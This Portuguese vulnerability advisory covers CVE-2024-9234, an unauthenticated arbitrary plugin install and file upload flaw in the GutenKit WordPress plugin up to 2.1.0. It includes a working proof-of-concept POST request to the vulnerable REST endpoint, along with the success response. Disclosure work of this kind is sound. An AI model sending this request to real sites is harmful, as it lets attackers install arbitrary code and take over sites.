
GutenKit <= 2.1.0 - Upload de Arquivo Arbitrário Não Autenticado
GutenKit <= 2.1.0 - Upload Arbitrário de Arquivos Não Autenticado
O plugin GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor para WordPress é vulnerável a uploads arbitrários de arquivos devido à falta de verificação de capacidade na função install_and_activate_plugin_from_external() (endpoint REST API install-active-plugin) em todas as versões até, e incluindo, 2.1.0. Isso possibilita que atacantes não autenticados instalem e ativem plugins arbitrários, ou utilizem a funcionalidade para fazer upload de arquivos arbitrários disfarçados de plugins.
Type: plugin
CVSS Score: 9.8
CVE: CVE-2024-9234
Slug: gutenkit-blocks-addon
Link de Download: Baixar gutenkit-blocks-addon Versão 2.1.0
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Type: application/json
Content-Length: 114
{
"plugin": "https://downloads.wordpress.org/plugin/popularis-extra.1.2.6.zip",
"slug": "popularis-extra"
}
{"success":true,"data":"Plugin installed successfully!"}